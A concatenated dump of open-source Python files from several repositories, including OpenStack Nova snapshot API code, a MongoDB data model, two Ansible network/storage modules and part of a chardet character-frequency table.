if bdm.volume_id:
results.append(entity_maker(bdm.volume_id,
bdm.instance_uuid,
bdm.device_name))
return {'volumeAttachments': results}
def _translate_snapshot_detail_view(context, vol):
"""Maps keys for snapshots details view."""
d = _translate_snapshot_summary_view(context, vol)
# NOTE(gagupta): No additional data / lookups at the moment
return d
def _translate_snapshot_summary_view(context, vol):
"""Maps keys for snapshots summary view."""
d = {}
d['id'] = vol['id']
d['volumeId'] = vol['volume_id']
d['status'] = vol['status']
# NOTE(gagupta): We map volume_size as the snapshot size
d['size'] = vol['volume_size']
d['createdAt'] = vol['created_at']
d['displayName'] = vol['display_name']
d['displayDescription'] = vol['display_description']
return d
def make_snapshot(elem):
elem.set('id')
elem.set('status')
elem.set('size')
elem.set('createdAt')
elem.set('displayName')
elem.set('displayDescription')
elem.set('volumeId')
class SnapshotTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('snapshot', selector='snapshot')
make_snapshot(root)
return xmlutil.MasterTemplate(root, 1)
class SnapshotsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('snapshots')
elem = xmlutil.SubTemplateElement(root, 'snapshot',
selector='snapshots')
make_snapshot(elem)
return xmlutil.MasterTemplate(root, 1)
class SnapshotController(wsgi.Controller):
"""The Snapshots API controller for the OpenStack API."""
def __init__(self):
self.volume_api = volume.API()
super(SnapshotController, self).__init__()
@wsgi.serializers(xml=SnapshotTemplate)
def show(self, req, id):
"""Return data about the given snapshot."""
context = req.environ['nova.context']
authorize(context)
try:
vol = self.volume_api.get_snapshot(context, id)
except exception.NotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
return {'snapshot': _translate_snapshot_detail_view(context, vol)}
def delete(self, req, id):
"""Delete a snapshot."""
context = req.environ['nova.context']
authorize(context)
LOG.audit(_("Delete snapshot with id: %s"), id, context=context)
try:
self.volume_api.delete_snapshot(context, id)
except exception.NotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
return webob.Response(status_int=202)
@wsgi.serializers(xml=SnapshotsTemplate)
def index(self, req):
"""Returns a summary list of snapshots."""
return self._items(req, entity_maker=_translate_snapshot_summary_view)
@wsgi.serializers(xml=SnapshotsTemplate)
def detail(self, req):
"""Returns a detailed list of snapshots."""
return self._items(req, entity_maker=_translate_snapshot_detail_view)
def _items(self, req, entity_maker):
"""Returns a list of snapshots, transformed through entity_maker."""
context = req.environ['nova.context']
authorize(context)
snapshots = self.volume_api.get_all_snapshots(context)
limited_list = common.limited(snapshots, req)
res = [entity_maker(context, snapshot) for snapshot in limited_list]
return {'snapshots': res}
@wsgi.serializers(xml=SnapshotTemplate)
def create(self, req, body):
"""Creates a new snapshot."""
context = req.environ['nova.context']
authorize(context)
if not self.is_valid_body(body, 'snapshot'):
msg = _("snapshot not specified")
raise exc.HTTPBadRequest(explanation=msg)
snapshot = body['snapshot']
volume_id = snapshot['volume_id']
LOG.audit(_("Create snapshot from volume %s"), volume_id,
context=context)
force = snapshot.get('force', False)
try:
force = strutils.bool_from_string(force, strict=True)
except ValueError:
msg = _("Invalid value '%s' for force.") % force
raise exc.HTTPBadRequest(explanation=msg)
if force:
create_func = self.volume_api.create_snapshot_force
else:
create_func = self.volume_api.create_snapshot
new_snapshot = create_func(context, volume_id,
snapshot.get('display_name'),
snapshot.get('display_description'))
retval = _translate_snapshot_detail_view(context, new_snapshot)
return {'snapshot': retval}
class Volumes(extensions.ExtensionDescriptor):
"""Volumes support."""
name = "Volumes"
alias = "os-volumes"
namespace = "http://docs.openstack.org/compute/ext/volumes/api/v1.1"
updated = "2011-03-25T00:00:00Z"
def get_resources(self):
resources = []
# NOTE(justinsb): No way to provide singular name ('volume')
# Does this matter?
res = extensions.ResourceExtension('os-volumes',
VolumeController(),
collection_actions={'detail': 'GET'})
resources.append(res)
attachment_controller = VolumeAttachmentController(self.ext_mgr)
res = extensions.ResourceExtension('os-volume_attachments',
attachment_controller,
parent=dict(
member_name='server',
collection_name='servers'))
resources.append(res)
res = extensions.ResourceExtension('os-volumes_boot',
inherits='servers')
resources.append(res)
res = extensions.ResourceExtension('os-snapshots',
SnapshotController(),
collection_actions={'detail': 'GET'})
resources.append(res)
return resources
| apache-2.0 |
pld/bamboo | bamboo/models/observation.py | 2 | 13221 | from math import ceil
from pandas import concat, DataFrame
from pymongo.errors import AutoReconnect
from bamboo.core.frame import add_id_column, DATASET_ID, INDEX
from bamboo.lib.datetools import now, parse_timestamp_query
from bamboo.lib.mongo import MONGO_ID, MONGO_ID_ENCODED
from bamboo.lib.parsing import parse_columns
from bamboo.lib.query_args import QueryArgs
from bamboo.lib.utils import combine_dicts, invert_dict, replace_keys
from bamboo.models.abstract_model import AbstractModel
def add_index(df):
"""Add an encoded index to this DataFrame."""
if not INDEX in df.columns:
# No index, create index for this dframe.
if not 'index' in df.columns:
# Custom index not supplied, use pandas default index.
df.reset_index(inplace=True)
df.rename(columns={'index': INDEX}, inplace=True)
return df
def encode(dframe, dataset, append_index=True):
"""Encode the columns for `dataset` to slugs and add ID column.
The ID column is the dataset_id for dataset. This is
used to link observations to a specific dataset.
:param dframe: The DataFrame to encode.
:param dataset: The Dataset to use a mapping for.
:param append_index: Add index to the DataFrame, default True.
:returns: A modified `dframe`.
"""
if append_index:
dframe = add_index(dframe)
dframe = add_id_column(dframe, dataset.dataset_id)
encoded_columns_map = dataset.schema.rename_map_for_dframe(dframe)
return dframe.rename(columns=encoded_columns_map)
def update_calculations(record, dataset):
calculations = dataset.calculations(include_aggs=False)
if len(calculations):
dframe = DataFrame(data=record, index=[0])
labels_to_slugs = dataset.schema.labels_to_slugs
for c in calculations:
columns = parse_columns(dataset, c.formula, c.name, dframe=dframe)
record[labels_to_slugs[c.name]] = columns[0][0]
return record
class Observation(AbstractModel):
__collectionname__ = 'observations'
DELETED_AT = '-1' # use a short code for key
ENCODING = 'enc'
ENCODING_DATASET_ID = '%s_%s' % (DATASET_ID, ENCODING)
@classmethod
def delete(cls, dataset, index):
"""Delete observation at index for dataset.
:param dataset: The dataset to delete the observation from.
:param index: The index of the observation to delete.
"""
query = {INDEX: index, DATASET_ID: dataset.dataset_id}
query = cls.encode(query, dataset=dataset)
cls.__soft_delete(query)
@classmethod
def delete_all(cls, dataset, query=None):
"""Delete the observations for `dataset`.
:param dataset: The dataset to delete observations for.
:param query: An optional query to restrict deletion.
"""
query = query or {}
query.update({DATASET_ID: dataset.dataset_id})
query = cls.encode(query, dataset=dataset)
super(cls, cls()).delete(query)
@classmethod
def delete_columns(cls, dataset, columns):
"""Delete a column from the dataset."""
encoding = cls.encoding(dataset)
cls.unset({cls.ENCODING_DATASET_ID: dataset.dataset_id},
{"%s.%s" % (cls.ENCODING, c): 1 for c in columns})
cls.unset(
cls.encode({DATASET_ID: dataset.dataset_id}, encoding=encoding),
cls.encode({c: 1 for c in columns}, encoding=encoding))
@classmethod
def delete_encoding(cls, dataset):
query = {cls.ENCODING_DATASET_ID: dataset.dataset_id}
super(cls, cls()).delete(query)
@classmethod
def encoding(cls, dataset, encoded_dframe=None):
record = super(cls, cls).find_one({
cls.ENCODING_DATASET_ID: dataset.dataset_id}).record
if record is None and encoded_dframe is not None:
encoding = cls.__make_encoding(encoded_dframe)
cls.__store_encoding(dataset, encoding)
return cls.encoding(dataset)
return record[cls.ENCODING] if record else None
@classmethod
def encode(cls, dict_, dataset=None, encoding=None):
if dataset:
encoding = cls.encoding(dataset)
return replace_keys(dict_, encoding) if encoding else dict_
@classmethod
def decoding(cls, dataset):
return invert_dict(cls.encoding(dataset))
@classmethod
def find(cls, dataset, query_args=None, as_cursor=False,
include_deleted=False):
"""Return observation rows matching parameters.
:param dataset: Dataset to return rows for.
:param include_deleted: If True, return delete records, default False.
:param query_args: An optional QueryArgs to hold the query arguments.
:raises: `JSONError` if the query could not be parsed.
:returns: A list of dictionaries matching the passed in `query` and
other parameters.
"""
encoding = cls.encoding(dataset) or {}
query_args = query_args or QueryArgs()
query_args.query = parse_timestamp_query(query_args.query,
dataset.schema)
query_args.encode(encoding, {DATASET_ID: dataset.dataset_id})
if not include_deleted:
query = query_args.query
query[cls.DELETED_AT] = 0
query_args.query = query
# exclude deleted at column
query_args.select = query_args.select or {cls.DELETED_AT: 0}
distinct = query_args.distinct
records = super(cls, cls).find(query_args, as_dict=True,
as_cursor=(as_cursor or distinct))
return records.distinct(encoding.get(distinct, distinct)) if distinct\
else records
@classmethod
def update_from_dframe(cls, df, dataset):
dataset.build_schema(df)
encoded_dframe = encode(df.reset_index(), dataset, append_index=False)
encoding = cls.encoding(dataset)
cls.__batch_update(encoded_dframe, encoding)
cls.__store_encoding(dataset, encoding)
dataset.update_stats(df, update=True)
@classmethod
def find_one(cls, dataset, index, decode=True):
"""Return row by index.
:param dataset: The dataset to find the row for.
:param index: The index of the row to find.
"""
query = {INDEX: index, DATASET_ID: dataset.dataset_id,
cls.DELETED_AT: 0}
query = cls.encode(query, dataset=dataset)
decoding = cls.decoding(dataset)
record = super(cls, cls).find_one(query, as_dict=True)
return cls(cls.encode(record, encoding=decoding) if decode else record)
@classmethod
def append(cls, dframe, dataset):
"""Append an additional dframe to an existing dataset.
:params dframe: The DataFrame to append.
:params dataset: The DataSet to add `dframe` to.
"""
encoded_dframe = encode(dframe, dataset)
encoding = cls.encoding(dataset, encoded_dframe)
cls.__batch_save(encoded_dframe, encoding)
dataset.clear_summary_stats()
@classmethod
def save(cls, dframe, dataset):
"""Save data in `dframe` with the `dataset`.
Encode `dframe` for MongoDB, and add fields to identify it with the
passed in `dataset`. All column names in `dframe` are converted to
slugs using the dataset's schema. The dataset is update to store the
size of the stored data.
:param dframe: The DataFrame to store.
:param dataset: The dataset to store the dframe in.
"""
# Build schema for the dataset after having read it from file.
if not dataset.schema:
dataset.build_schema(dframe)
# Update stats, before inplace encoding.
dataset.update_stats(dframe)
encoded_dframe = encode(dframe, dataset)
encoding = cls.encoding(dataset, encoded_dframe)
cls.__batch_save(encoded_dframe, encoding)
@classmethod
def update(cls, dataset, index, record):
"""Update a dataset row by index.
The record dictionary will update, not replace, the data in the row at
index.
:param dataset: The dataset to update a row for.
:param dex: The index of the row to update.
:param record: The dictionary to update the row with.
"""
previous_record = cls.find_one(dataset, index).record
previous_record.pop(MONGO_ID)
record = combine_dicts(previous_record, record)
record = update_calculations(record, dataset)
record = cls.encode(record, dataset=dataset)
cls.delete(dataset, index)
super(cls, cls()).save(record)
@classmethod
def batch_read_dframe_from_cursor(cls, dataset, observations, distinct,
limit):
"""Read a DataFrame from a MongoDB Cursor in batches."""
dframes = []
batch = 0
decoding = cls.decoding(dataset)
while True:
start = batch * cls.DB_READ_BATCH_SIZE
end = start + cls.DB_READ_BATCH_SIZE
if limit > 0 and end > limit:
end = limit
# if there is a limit this may occur, and we are done
if start >= end:
break
current_observations = [
replace_keys(ob, decoding) for ob in observations[start:end]]
# if the batches exhausted the data
if not len(current_observations):
break
dframes.append(DataFrame(current_observations))
if not distinct:
observations.rewind()
batch += 1
return concat(dframes) if len(dframes) else DataFrame()
@classmethod
def __batch_save(cls, dframe, encoding):
"""Save records in batches to avoid document size maximum setting.
:param dframe: A DataFrame to save in the current model.
"""
def command(records, encoding):
cls.collection.insert(records)
batch_size = cls.DB_SAVE_BATCH_SIZE
cls.__batch_command_wrapper(command, dframe, encoding, batch_size)
@classmethod
def __batch_update(cls, dframe, encoding):
"""Update records in batches to avoid document size maximum setting.
DataFrame must have column with record (object) ids.
:param dfarme: The DataFrame to update.
"""
def command(records, encoding):
# Encode the reserved key to access the row ID.
mongo_id_key = encoding.get(MONGO_ID_ENCODED, MONGO_ID_ENCODED)
# MongoDB has no batch updates.
for record in records:
spec = {MONGO_ID: record[mongo_id_key]}
del record[mongo_id_key]
doc = {'$set': record}
cls.collection.update(spec, doc)
cls.__batch_command_wrapper(command, dframe, encoding,
cls.DB_SAVE_BATCH_SIZE)
@classmethod
def __batch_command_wrapper(cls, command, df, encoding, batch_size):
try:
cls.__batch_command(command, df, encoding, batch_size)
except AutoReconnect:
batch_size /= 2
# If batch size drop is less than MIN_BATCH_SIZE, assume the
# records are too large or there is another error and fail.
if batch_size >= cls.MIN_BATCH_SIZE:
cls.__batch_command_wrapper(command, df, encoding, batch_size)
@classmethod
def __batch_command(cls, command, dframe, encoding, batch_size):
batches = int(ceil(float(len(dframe)) / batch_size))
for batch in xrange(0, batches):
start = batch * batch_size
end = start + batch_size
current_dframe = dframe[start:end]
records = cls.__encode_records(current_dframe, encoding)
command(records, encoding)
@classmethod
def __encode_records(cls, dframe, encoding):
return [cls.__encode_record(row.to_dict(), encoding)
for (_, row) in dframe.iterrows()]
@classmethod
def __encode_record(cls, row, encoding):
encoded = replace_keys(row, encoding)
encoded[cls.DELETED_AT] = 0
return encoded
@classmethod
def __make_encoding(cls, dframe, start=0):
# Ensure that DATASET_ID is first so that we can guarantee an index.
columns = [DATASET_ID] + sorted(dframe.columns - [DATASET_ID])
return {v: str(start + i) for (i, v) in enumerate(columns)}
@classmethod
def __soft_delete(cls, query):
cls.collection.update(query,
{'$set': {cls.DELETED_AT: now().isoformat()}})
@classmethod
def __store_encoding(cls, dataset, encoding):
"""Store encoded columns with dataset.
:param dataset: The dataset to store the encoding with.
:param encoding: The encoding for dataset.
"""
record = {cls.ENCODING_DATASET_ID: dataset.dataset_id,
cls.ENCODING: encoding}
super(cls, cls()).delete({cls.ENCODING_DATASET_ID: dataset.dataset_id})
super(cls, cls()).save(record)
| bsd-3-clause |
veger/ansible | lib/ansible/modules/storage/netapp/_na_cdot_aggregate.py | 15 | 7289 | #!/usr/bin/python
# (c) 2017, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['deprecated'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: na_cdot_aggregate
short_description: Manage NetApp cDOT aggregates.
extends_documentation_fragment:
- netapp.ontap
version_added: '2.3'
author: Sumit Kumar (@timuster) <sumit4@netapp.com>
deprecated:
removed_in: '2.11'
why: Updated modules released with increased functionality
alternative: Use M(na_ontap_aggregate) instead.
description:
- Create or destroy aggregates on NetApp cDOT.
options:
state:
required: true
description:
- Whether the specified aggregate should exist or not.
choices: ['present', 'absent']
name:
required: true
description:
- The name of the aggregate to manage.
disk_count:
description:
- Number of disks to place into the aggregate, including parity disks.
- The disks in this newly-created aggregate come from the spare disk pool.
- The smallest disks in this pool join the aggregate first, unless the C(disk-size) argument is provided.
- Either C(disk-count) or C(disks) must be supplied. Range [0..2^31-1].
- Required when C(state=present).
'''
EXAMPLES = """
- name: Manage Aggregates
na_cdot_aggregate:
state: present
name: ansibleAggr
disk_count: 1
hostname: "{{ netapp_hostname }}"
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
- name: Manage Aggregates
na_cdot_aggregate:
state: present
name: ansibleAggr
hostname: "{{ netapp_hostname }}"
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
"""
RETURN = """
"""
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible.module_utils.netapp as netapp_utils
HAS_NETAPP_LIB = netapp_utils.has_netapp_lib()
class NetAppCDOTAggregate(object):
def __init__(self):
self.argument_spec = netapp_utils.ontap_sf_host_argument_spec()
self.argument_spec.update(dict(
state=dict(required=True, choices=['present', 'absent']),
name=dict(required=True, type='str'),
disk_count=dict(required=False, type='int'),
))
self.module = AnsibleModule(
argument_spec=self.argument_spec,
required_if=[
('state', 'present', ['disk_count'])
],
supports_check_mode=True
)
p = self.module.params
# set up state variables
self.state = p['state']
self.name = p['name']
self.disk_count = p['disk_count']
if HAS_NETAPP_LIB is False:
self.module.fail_json(msg="the python NetApp-Lib module is required")
else:
self.server = netapp_utils.setup_ontap_zapi(module=self.module)
def get_aggr(self):
"""
Checks if aggregate exists.
:return:
True if aggregate found
False if aggregate is not found
:rtype: bool
"""
aggr_get_iter = netapp_utils.zapi.NaElement('aggr-get-iter')
query_details = netapp_utils.zapi.NaElement.create_node_with_children(
'aggr-attributes', **{'aggregate-name': self.name})
query = netapp_utils.zapi.NaElement('query')
query.add_child_elem(query_details)
aggr_get_iter.add_child_elem(query)
try:
result = self.server.invoke_successfully(aggr_get_iter,
enable_tunneling=False)
except netapp_utils.zapi.NaApiError as e:
# Error 13040 denotes an aggregate not being found.
if to_native(e.code) == "13040":
return False
else:
self.module.fail_json(msg=to_native(e), exception=traceback.format_exc())
if (result.get_child_by_name('num-records') and
int(result.get_child_content('num-records')) >= 1):
return True
else:
return False
def create_aggr(self):
aggr_create = netapp_utils.zapi.NaElement.create_node_with_children(
'aggr-create', **{'aggregate': self.name,
'disk-count': str(self.disk_count)})
try:
self.server.invoke_successfully(aggr_create,
enable_tunneling=False)
except netapp_utils.zapi.NaApiError as e:
self.module.fail_json(msg="Error provisioning aggregate %s: %s" % (self.name, to_native(e)),
exception=traceback.format_exc())
def delete_aggr(self):
aggr_destroy = netapp_utils.zapi.NaElement.create_node_with_children(
'aggr-destroy', **{'aggregate': self.name})
try:
self.server.invoke_successfully(aggr_destroy,
enable_tunneling=False)
except netapp_utils.zapi.NaApiError as e:
self.module.fail_json(msg="Error removing aggregate %s: %s" % (self.name, to_native(e)),
exception=traceback.format_exc())
def rename_aggregate(self):
aggr_rename = netapp_utils.zapi.NaElement.create_node_with_children(
'aggr-rename', **{'aggregate': self.name,
'new-aggregate-name':
self.name})
try:
self.server.invoke_successfully(aggr_rename,
enable_tunneling=False)
except netapp_utils.zapi.NaApiError as e:
self.module.fail_json(msg="Error renaming aggregate %s: %s" % (self.name, to_native(e)),
exception=traceback.format_exc())
def apply(self):
changed = False
aggregate_exists = self.get_aggr()
rename_aggregate = False
# check if anything needs to be changed (add/delete/update)
if aggregate_exists:
if self.state == 'absent':
changed = True
elif self.state == 'present':
if self.name is not None and not self.name == \
self.name:
rename_aggregate = True
changed = True
else:
if self.state == 'present':
# Aggregate does not exist, but requested state is present.
changed = True
if changed:
if self.module.check_mode:
pass
else:
if self.state == 'present':
if not aggregate_exists:
self.create_aggr()
else:
if rename_aggregate:
self.rename_aggregate()
elif self.state == 'absent':
self.delete_aggr()
self.module.exit_json(changed=changed)
def main():
v = NetAppCDOTAggregate()
v.apply()
if __name__ == '__main__':
main()
| gpl-3.0 |
abadger/ansible-modules-core | network/nxos/nxos_ospf.py | 21 | 9659 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = '''
---
module: nxos_ospf
version_added: "2.2"
short_description: Manages configuration of an ospf instance.
description:
- Manages configuration of an ospf instance.
author: Gabriele Gerbino (@GGabriele)
extends_documentation_fragment: nxos
options:
ospf:
description:
- Name of the ospf instance.
required: true
state:
description:
- Determines whether the config should be present or not
on the device.
required: false
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- nxos_ospf:
ospf: 1
state: present
username: "{{ un }}"
password: "{{ pwd }}"
host: "{{ inventory_hostname }}"
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: verbose mode
type: dict
sample: {"ospf": "1"}
existing:
description: k/v pairs of existing configuration
returned: verbose mode
type: dict
sample: {"ospf": ["2"]}
end_state:
description: k/v pairs of configuration after module execution
returned: verbose mode
type: dict
sample: {"ospf": ["1", "2"]}
updates:
description: commands sent to the device
returned: always
type: list
sample: ["router ospf 1"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
# COMMON CODE FOR MIGRATION
import re
import ansible.module_utils.nxos
from ansible.module_utils.basic import get_exception
from ansible.module_utils.netcfg import NetworkConfig, ConfigLine
from ansible.module_utils.network import NetworkModule
from ansible.module_utils.shell import ShellError
def to_list(val):
if isinstance(val, (list, tuple)):
return list(val)
elif val is not None:
return [val]
else:
return list()
class CustomNetworkConfig(NetworkConfig):
def expand_section(self, configobj, S=None):
if S is None:
S = list()
S.append(configobj)
for child in configobj.children:
if child in S:
continue
self.expand_section(child, S)
return S
def get_object(self, path):
for item in self.items:
if item.text == path[-1]:
parents = [p.text for p in item.parents]
if parents == path[:-1]:
return item
def to_block(self, section):
return '\n'.join([item.raw for item in section])
def get_section(self, path):
try:
section = self.get_section_objects(path)
return self.to_block(section)
except ValueError:
return list()
def get_section_objects(self, path):
if not isinstance(path, list):
path = [path]
obj = self.get_object(path)
if not obj:
raise ValueError('path does not exist in config')
return self.expand_section(obj)
def add(self, lines, parents=None):
"""Adds one or lines of configuration
"""
ancestors = list()
offset = 0
obj = None
## global config command
if not parents:
for line in to_list(lines):
item = ConfigLine(line)
item.raw = line
if item not in self.items:
self.items.append(item)
else:
for index, p in enumerate(parents):
try:
i = index + 1
obj = self.get_section_objects(parents[:i])[0]
ancestors.append(obj)
except ValueError:
# add parent to config
offset = index * self.indent
obj = ConfigLine(p)
obj.raw = p.rjust(len(p) + offset)
if ancestors:
obj.parents = list(ancestors)
ancestors[-1].children.append(obj)
self.items.append(obj)
ancestors.append(obj)
# add child objects
for line in to_list(lines):
# check if child already exists
for child in ancestors[-1].children:
if child.text == line:
break
else:
offset = len(parents) * self.indent
item = ConfigLine(line)
item.raw = line.rjust(len(line) + offset)
item.parents = ancestors
ancestors[-1].children.append(item)
self.items.append(item)
def get_network_module(**kwargs):
try:
return get_module(**kwargs)
except NameError:
return NetworkModule(**kwargs)
def get_config(module, include_defaults=False):
config = module.params['config']
if not config:
try:
config = module.get_config()
except AttributeError:
defaults = module.params['include_defaults']
config = module.config.get_config(include_defaults=defaults)
return CustomNetworkConfig(indent=2, contents=config)
def load_config(module, candidate):
config = get_config(module)
commands = candidate.difference(config)
commands = [str(c).strip() for c in commands]
save_config = module.params['save']
result = dict(changed=False)
if commands:
if not module.check_mode:
try:
module.configure(commands)
except AttributeError:
module.config(commands)
if save_config:
try:
module.config.save_config()
except AttributeError:
module.execute(['copy running-config startup-config'])
result['changed'] = True
result['updates'] = commands
return result
# END OF COMMON CODE
PARAM_TO_COMMAND_KEYMAP = {
'ospf': 'router ospf'
}
def invoke(name, *args, **kwargs):
func = globals().get(name)
if func:
return func(*args, **kwargs)
def get_value(config, module):
splitted_config = config.splitlines()
value_list = []
REGEX = '^router ospf\s(?P<ospf>\S+).*'
for line in splitted_config:
value = ''
if 'router ospf' in line:
try:
match_ospf = re.match(REGEX, line, re.DOTALL)
ospf_group = match_ospf.groupdict()
value = ospf_group['ospf']
except AttributeError:
value = ''
if value:
value_list.append(value)
return value_list
def get_existing(module):
existing = {}
config = str(get_config(module))
value = get_value(config, module)
if value:
existing['ospf'] = value
return existing
def apply_key_map(key_map, table):
new_dict = {}
for key, value in table.items():
new_key = key_map.get(key)
if new_key:
value = table.get(key)
if value:
new_dict[new_key] = value
else:
new_dict[new_key] = value
return new_dict
def state_present(module, proposed, candidate):
commands = ['router ospf {0}'.format(proposed['ospf'])]
candidate.add(commands, parents=[])
def state_absent(module, proposed, candidate):
commands = ['no router ospf {0}'.format(proposed['ospf'])]
candidate.add(commands, parents=[])
def main():
argument_spec = dict(
ospf=dict(required=True, type='str'),
state=dict(choices=['present', 'absent'], default='present',
required=False),
include_defaults=dict(default=True),
config=dict(),
save=dict(type='bool', default=False)
)
module = get_network_module(argument_spec=argument_spec,
supports_check_mode=True)
state = module.params['state']
ospf = str(module.params['ospf'])
existing = invoke('get_existing', module)
end_state = existing
proposed = dict(ospf=ospf)
if not existing:
existing_list = []
else:
existing_list = existing['ospf']
result = {}
if (state == 'present' or (state == 'absent' and ospf in existing_list)):
candidate = CustomNetworkConfig(indent=3)
invoke('state_%s' % state, module, proposed, candidate)
try:
response = load_config(module, candidate)
result.update(response)
except ShellError:
exc = get_exception()
module.fail_json(msg=str(exc))
else:
result['updates'] = []
result['connected'] = module.connected
if module._verbosity > 0:
end_state = invoke('get_existing', module)
result['end_state'] = end_state
result['existing'] = existing
result['proposed'] = proposed
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
Sorsly/subtle | google-cloud-sdk/lib/third_party/chardet/gb2312freq.py | 323 | 36001 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# GB2312 most frequently used character table
#
# Char to FreqOrder table , from hz6763
# 512 --> 0.79 -- 0.79
# 1024 --> 0.92 -- 0.13
# 2048 --> 0.98 -- 0.06
# 6768 --> 1.00 -- 0.02
#
# Ideal Distribution Ratio = 0.79135/(1-0.79135) = 3.79
# Random Distribution Ration = 512 / (3755 - 512) = 0.157
#
# Typical Distribution Ratio about 25% of Ideal one, still much higher that RDR
GB2312_TYPICAL_DISTRIBUTION_RATIO = 0.9
GB2312_TABLE_SIZE = 3760
GB2312CharToFreqOrder = ( \
1671, 749,1443,2364,3924,3807,2330,3921,1704,3463,2691,1511,1515, 572,3191,2205,
2361, 224,2558, 479,1711, 963,3162, 440,4060,1905,2966,2947,3580,2647,3961,3842,
2204, 869,4207, 970,2678,5626,2944,2956,1479,4048, 514,3595, 588,1346,2820,3409,
249,4088,1746,1873,2047,1774, 581,1813, 358,1174,3590,1014,1561,4844,2245, 670,
1636,3112, 889,1286, 953, 556,2327,3060,1290,3141, 613, 185,3477,1367, 850,3820,
1715,2428,2642,2303,2732,3041,2562,2648,3566,3946,1349, 388,3098,2091,1360,3585,
152,1687,1539, 738,1559, 59,1232,2925,2267,1388,1249,1741,1679,2960, 151,1566,
1125,1352,4271, 924,4296, 385,3166,4459, 310,1245,2850, 70,3285,2729,3534,3575,
2398,3298,3466,1960,2265, 217,3647, 864,1909,2084,4401,2773,1010,3269,5152, 853,
3051,3121,1244,4251,1895, 364,1499,1540,2313,1180,3655,2268, 562, 715,2417,3061,
544, 336,3768,2380,1752,4075, 950, 280,2425,4382, 183,2759,3272, 333,4297,2155,
1688,2356,1444,1039,4540, 736,1177,3349,2443,2368,2144,2225, 565, 196,1482,3406,
927,1335,4147, 692, 878,1311,1653,3911,3622,1378,4200,1840,2969,3149,2126,1816,
2534,1546,2393,2760, 737,2494, 13, 447, 245,2747, 38,2765,2129,2589,1079, 606,
360, 471,3755,2890, 404, 848, 699,1785,1236, 370,2221,1023,3746,2074,2026,2023,
2388,1581,2119, 812,1141,3091,2536,1519, 804,2053, 406,1596,1090, 784, 548,4414,
1806,2264,2936,1100, 343,4114,5096, 622,3358, 743,3668,1510,1626,5020,3567,2513,
3195,4115,5627,2489,2991, 24,2065,2697,1087,2719, 48,1634, 315, 68, 985,2052,
198,2239,1347,1107,1439, 597,2366,2172, 871,3307, 919,2487,2790,1867, 236,2570,
1413,3794, 906,3365,3381,1701,1982,1818,1524,2924,1205, 616,2586,2072,2004, 575,
253,3099, 32,1365,1182, 197,1714,2454,1201, 554,3388,3224,2748, 756,2587, 250,
2567,1507,1517,3529,1922,2761,2337,3416,1961,1677,2452,2238,3153, 615, 911,1506,
1474,2495,1265,1906,2749,3756,3280,2161, 898,2714,1759,3450,2243,2444, 563, 26,
3286,2266,3769,3344,2707,3677, 611,1402, 531,1028,2871,4548,1375, 261,2948, 835,
1190,4134, 353, 840,2684,1900,3082,1435,2109,1207,1674, 329,1872,2781,4055,2686,
2104, 608,3318,2423,2957,2768,1108,3739,3512,3271,3985,2203,1771,3520,1418,2054,
1681,1153, 225,1627,2929, 162,2050,2511,3687,1954, 124,1859,2431,1684,3032,2894,
585,4805,3969,2869,2704,2088,2032,2095,3656,2635,4362,2209, 256, 518,2042,2105,
3777,3657, 643,2298,1148,1779, 190, 989,3544, 414, 11,2135,2063,2979,1471, 403,
3678, 126, 770,1563, 671,2499,3216,2877, 600,1179, 307,2805,4937,1268,1297,2694,
252,4032,1448,1494,1331,1394, 127,2256, 222,1647,1035,1481,3056,1915,1048, 873,
3651, 210, 33,1608,2516, 200,1520, 415, 102, 0,3389,1287, 817, 91,3299,2940,
836,1814, 549,2197,1396,1669,2987,3582,2297,2848,4528,1070, 687, 20,1819, 121,
1552,1364,1461,1968,2617,3540,2824,2083, 177, 948,4938,2291, 110,4549,2066, 648,
3359,1755,2110,2114,4642,4845,1693,3937,3308,1257,1869,2123, 208,1804,3159,2992,
2531,2549,3361,2418,1350,2347,2800,2568,1291,2036,2680, 72, 842,1990, 212,1233,
1154,1586, 75,2027,3410,4900,1823,1337,2710,2676, 728,2810,1522,3026,4995, 157,
755,1050,4022, 710, 785,1936,2194,2085,1406,2777,2400, 150,1250,4049,1206, 807,
1910, 534, 529,3309,1721,1660, 274, 39,2827, 661,2670,1578, 925,3248,3815,1094,
